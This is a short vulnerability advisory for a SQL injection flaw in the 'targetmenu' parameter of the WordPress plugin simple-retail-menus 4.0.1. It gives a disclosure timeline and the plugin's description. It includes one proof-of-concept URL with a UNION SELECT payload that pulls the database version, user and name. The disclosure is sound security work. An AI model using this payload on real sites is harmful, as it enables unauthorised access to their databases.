wp-plugin : simple-retail-menus – A1-Injection

 

Plugin Details

 

Plugin Name : simple-retail-menus

 

Effected Version : 4.0.1 (and most probably lower version's if any)

 
Vulnerability : A1-Injection
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Editor

 

PoC - (Proof of Concept) :

 

http://localhost/wp-admin/admin.php?page=jsrm-retail-menus&mode=edit&targetmenu=2 union select @@version,2,user(),database(),5,6,7,8

 

Vulnerable Parameter : targetmenu

 

Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=861170%40simple-retail-menus&old=728969%40simple-retail-menus&sfp_email=&sfph_mail=#file1

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-25

 
Plugin Status : Updated on 2014-02-19
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
Perfect for salon, restaurant, and retail store websites, as well as many other applications. Simple Retail Menus lets you create and manage menu-type lists for display in a post or page. This is a free, full-featured plugin. Create as many menus as you want, add as many items as you want to any menu, add menus to any post or page on your WordPress site.

It's simple and easy to use! Just build your menus, then copy/paste the resulting 'shortcode' into you post or page.

Example of a shortcode: [simple-retail-menu id="1"]


= Plugin's Official Site =

http://whatwouldjessedo.com/simple-retail-menus/

Leave a Reply

Your email address will not be published. Required fields are marked *